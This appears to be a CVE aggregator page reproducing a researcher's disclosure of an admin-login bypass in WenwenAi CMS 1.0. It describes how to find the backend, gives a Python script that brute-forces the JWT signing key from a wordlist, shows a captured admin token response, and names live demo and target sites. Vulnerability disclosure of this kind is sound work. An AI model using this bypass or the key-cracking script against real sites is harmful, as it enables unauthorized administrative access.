Headline

CVE-2023-45990: WenwenAiCms Vulnerability Testing · Issue #2 · PwnCYN/Wenwenai

Insecure Permissions vulnerability in WenwenaiCMS v.1.0 allows a remote attacker to escalate privileges.

12 months ago

CVE

Open in Source

#vulnerability #js #nginx

Product Name:
Wenwenai CMS

Affect version:
1.0

Case Address:
Demo：https://chat.wenwen-ai.com/
Target：https://laoluoai.com/

Vulnerability Type:
Logical Fallacies

Description:

Discover the backend login address through directory scanning, obtain the developer’s demo site address on the login interface, log in and capture packets based on the account password provided by the demo site, and record the response packet of the login data packet.

Based on the correct login return packet, the site can be found for JWT verification, and signature information can be guessed by blasting.

When logging in to the same source CMS login interface with an unknown account password, modify the login packet to the successful login packet information to achieve JWT verification and successfully log in to the backend.

400 error is prompted when login information is not known. At this time, the returned data packet information can be modified to successful login data information to bypass login.

Blasting:

import jwt
import termcolor

if __name__ == "__main__":
    jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
    with open('topred.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                jwt.decode(jwt_str, verify=True, key=key_)
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
                    jwt.exceptions.ImmatureSignatureError):
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                continue
        else:
            print('\r', '\bsorry！ no key be found!')

Poc:

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding

{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

10 months ago

10 months ago

10 months ago

10 months ago

10 months ago